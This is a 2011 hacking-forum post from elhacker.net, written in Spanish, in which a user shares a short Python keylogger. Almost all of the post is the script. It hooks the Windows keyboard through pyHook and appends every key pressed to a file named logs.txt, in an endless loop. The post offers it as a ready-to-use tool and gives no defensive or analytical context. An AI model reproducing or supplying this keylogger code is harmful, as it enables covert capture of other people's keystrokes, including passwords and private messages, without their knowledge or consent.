Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: BigBear en 7 Octubre 2011, 01:38 am



Título: [Python] Simple Keylogger
Publicado por: BigBear en 7 Octubre 2011, 01:38 am
Un simple keylogger en Python

Código
  1. #!usr/bin/python
  2. #Simple Keylogger in Python
  3. #(C) Doddy Hackman 2011
  4.  
  5. import pyHook,pythoncom
  6.  
  7.  
  8. def savefile(name,text):
  9. file = open(name,"a")
  10. file.write(text+"\n")
  11. file.close()
  12.  
  13. def toma(frase):
  14. savefile("logs.txt",frase.Key)
  15.  
  16. def capturar():
  17. nave = pyHook.HookManager()
  18. nave.KeyDown = toma
  19. nave.HookKeyboard()
  20. pythoncom.PumpMessages()
  21.  
  22. while 1:
  23. capturar()
  24.  
  25. # The End